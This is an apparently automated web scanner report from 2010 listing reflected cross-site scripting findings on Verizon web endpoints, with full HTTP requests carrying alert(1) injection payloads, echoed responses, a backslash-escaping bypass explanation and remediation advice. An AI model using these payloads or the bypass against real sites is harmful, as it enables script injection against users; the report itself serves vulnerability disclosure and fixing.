GET /ads/js.ashx?page=shopvz.net/homepage63c88\'%3balert(1)//ae87b284984&pos=Right,Right1 HTTP/1.1 Host: syndicate.verizon.net Proxy-Connection: keep-alive Referer: http://surround.verizon.net/Shop/Utilities/verizonyourdomain.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=2cgrvsiuxtasbv552h1j3v45; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/plain; charset=utf-8 Content-Length: 2723 Date: Sat, 20 Nov 2010 02:06:45 GMT Connection: close
//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008 //New changes made on 06/25 and pushed to fuat on 06/25 //configuration OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/'; OAS_sitepage = 'shopvz.net/homepage63c88\\';alert(1)//ae87b284984'; OAS_listpos = 'Right,Right1'; OAS_query = 'popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=& ...[SNIP]...
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e25b\'%3balert(1)//34bbd0c359d was submitted in the pos parameter. This input was echoed as 2e25b\\';alert(1)//34bbd0c359d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ads/js.ashx?page=shopvz.net/homepage&pos=Right,Right12e25b\'%3balert(1)//34bbd0c359d HTTP/1.1 Host: syndicate.verizon.net Proxy-Connection: keep-alive Referer: http://surround.verizon.net/Shop/Utilities/verizonyourdomain.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=2cgrvsiuxtasbv552h1j3v45; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/plain; charset=utf-8 Content-Length: 2723 Date: Sat, 20 Nov 2010 02:06:46 GMT Connection: close
//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008 //New changes made on 06/25 and pushed to fuat on 06/25 //configuration OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/'; OAS_sitepage = 'shopvz.net/homepage'; OAS_listpos = 'Right,Right12e25b\\';alert(1)//34bbd0c359d'; OAS_query = 'popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&vi ...[SNIP]...
The value of the WT.ti request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c748"%3balert(1)//a814480360d was submitted in the WT.ti parameter. This input was echoed as 9c748";alert(1)//a814480360d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmarks/bmredirex.asp?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout9c748"%3balert(1)//a814480360d HTTP/1.1 Host: wapp.verizon.net Proxy-Connection: keep-alive Referer: http://www.verizon.net/central/appmanager/portal/vzcentral Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Server: Apache Content-Length: 152 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 01:48:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 01:48:34 GMT Connection: close Vary: Accept-Encoding Set-Cookie: VZCSESSIONID=T2NHMnySvcZpqX6wZM4gwP0QdlsfW8NSqTwB5vsX8vvGTd9mcWpV!133454377; path=/
The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e80cd"%3balert(1)//130ab0744e1 was submitted in the channel parameter. This input was echoed as e80cd";alert(1)//130ab0744e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmarks/bmredirex.asp?bm=goo_search&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmre80cd"%3balert(1)//130ab0744e1 HTTP/1.1 Host: wapp.verizon.net Proxy-Connection: keep-alive Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response (redirected)
HTTP/1.1 200 OK Server: Apache Content-Length: 221 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 02:09:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 02:09:53 GMT Connection: close Vary: Accept-Encoding Set-Cookie: VZCSESSIONID=2yWNMntR2VP6ScZhsjs316DnrdJyKR4tNT4KFC3Tlgw3M6qTrYxC!-16130884; path=/
The value of the clientid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee502"%3balert(1)//be7a3cddcbe was submitted in the clientid parameter. This input was echoed as ee502";alert(1)//be7a3cddcbe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmarks/bmredirex.asp?bm=goo_search&q='&web_search_type=basic&clientid=cnsmree502"%3balert(1)//be7a3cddcbe&channel=Nwcnsmr HTTP/1.1 Host: wapp.verizon.net Proxy-Connection: keep-alive Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response (redirected)
HTTP/1.1 200 OK Server: Apache Content-Length: 221 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 02:09:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 02:09:30 GMT Connection: close Vary: Accept-Encoding Set-Cookie: VZCSESSIONID=49hPMnthQRfmJYvnpJ7YLhQRMxK64N2vwmLvCfHFQqf4VKnbKGQy!-552517484; path=/
3.87. http://wapp.verizon.net/bookmarks/bmredirex.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://wapp.verizon.net
Path:
/bookmarks/bmredirex.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f54c1"%3balert(1)//67e8173d08d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f54c1";alert(1)//67e8173d08d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmarks/bmredirex.asp?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout&f54c1"%3balert(1)//67e8173d08d=1 HTTP/1.1 Host: wapp.verizon.net Proxy-Connection: keep-alive Referer: http://www.verizon.net/central/appmanager/portal/vzcentral Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Server: Apache Content-Length: 155 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 01:48:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 01:48:56 GMT Connection: close Vary: Accept-Encoding Set-Cookie: VZCSESSIONID=6WMRMnpLcT21tTHQ614mJtX0tcZp14FT8s1Ly11BB1kNqpGpDK6m!-552517484; path=/
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8b66"%3balert(1)//b6c880b93f7 was submitted in the q parameter. This input was echoed as f8b66";alert(1)//b6c880b93f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmarks/bmredirex.asp?bm=goo_search&q='f8b66"%3balert(1)//b6c880b93f7&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1 Host: wapp.verizon.net Proxy-Connection: keep-alive Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response (redirected)
HTTP/1.1 200 OK Server: Apache Content-Length: 221 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 02:08:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 02:08:45 GMT Connection: close Vary: Accept-Encoding Set-Cookie: VZCSESSIONID=QkFsMntNGTxpwFvTMLpddppD4hwQGbGJ0JMQcgH9Hm6mpLK12BHl!-16130884; path=/
The value of the web_search_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8b1d"%3balert(1)//54879207f6a was submitted in the web_search_type parameter. This input was echoed as d8b1d";alert(1)//54879207f6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmarks/bmredirex.asp?bm=goo_search&q='&web_search_type=basicd8b1d"%3balert(1)//54879207f6a&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1 Host: wapp.verizon.net Proxy-Connection: keep-alive Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response (redirected)
HTTP/1.1 200 OK Server: Apache Content-Length: 221 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Expires: Sat, 20 Nov 2010 02:09:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 02:09:08 GMT Connection: close Set-Cookie: VZCSESSIONID=3Z6JMntGTjQnpj89SqNJNCqKqk8Q965Xg3t45VjvdyLRx1npqRNk!-552517484; path=/
The value of the WT.ti request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26041"%3balert(1)//db67067f088 was submitted in the WT.ti parameter. This input was echoed as 26041";alert(1)//db67067f088 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /handlers/bookmarks_ex/redirectex.ashx?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout26041"%3balert(1)//db67067f088 HTTP/1.1 Host: wapp.verizon.net Proxy-Connection: keep-alive Referer: http://www.verizon.net/central/appmanager/portal/vzcentral Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Server: Apache Content-Length: 152 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 01:48:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 01:48:08 GMT Connection: close Vary: Accept-Encoding Set-Cookie: VZCSESSIONID=tJRbMnyY3CbLSg6h2jR6dxjvj3LwGxBkZF7LyXnM5TCF48L4p6G4!-1123586183; path=/
The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3e18"%3balert(1)//1ba31d2c96 was submitted in the channel parameter. This input was echoed as c3e18";alert(1)//1ba31d2c96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmrc3e18"%3balert(1)//1ba31d2c96 HTTP/1.1 Host: wapp.verizon.net Proxy-Connection: keep-alive Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response (redirected)
HTTP/1.1 200 OK Server: Apache Content-Length: 220 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 02:08:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 02:08:03 GMT Connection: close Vary: Accept-Encoding Set-Cookie: VZCSESSIONID=N0LMMntDQ3RpWt1Ch6H3NPdJYM9gz6cJ23S2zTrpNkZFPldZyDTL!-732060938; path=/
The value of the clientid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28952"%3balert(1)//a64a12a87fe was submitted in the clientid parameter. This input was echoed as 28952";alert(1)//a64a12a87fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='&web_search_type=basic&clientid=cnsmr28952"%3balert(1)//a64a12a87fe&channel=Nwcnsmr HTTP/1.1 Host: wapp.verizon.net Proxy-Connection: keep-alive Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response (redirected)
HTTP/1.1 200 OK Server: Apache Content-Length: 221 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 02:07:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 02:07:59 GMT Connection: close Vary: Accept-Encoding Set-Cookie: VZCSESSIONID=Sy2TMntffpm2wv5r2R1yT69GzhdMh6QTMyJDyYQztYdx8gR8vbmG!396615442; path=/
3.93. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://wapp.verizon.net
Path:
/handlers/bookmarks_ex/redirectex.ashx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17699"%3balert(1)//ab8a8ea1a80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17699";alert(1)//ab8a8ea1a80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /handlers/bookmarks_ex/redirectex.ashx?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout&17699"%3balert(1)//ab8a8ea1a80=1 HTTP/1.1 Host: wapp.verizon.net Proxy-Connection: keep-alive Referer: http://www.verizon.net/central/appmanager/portal/vzcentral Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Server: Apache Content-Length: 155 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 01:48:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 01:48:08 GMT Connection: close Vary: Accept-Encoding Set-Cookie: VZCSESSIONID=7g52MnyYqTy13KL31X5pnlsmbPLtrhtyjyP8rXxwQ66gzGgkcvRT!133454377; path=/
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e720"%3balert(1)//81de72d4a66 was submitted in the q parameter. This input was echoed as 4e720";alert(1)//81de72d4a66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='4e720"%3balert(1)//81de72d4a66&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1 Host: wapp.verizon.net Proxy-Connection: keep-alive Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response (redirected)
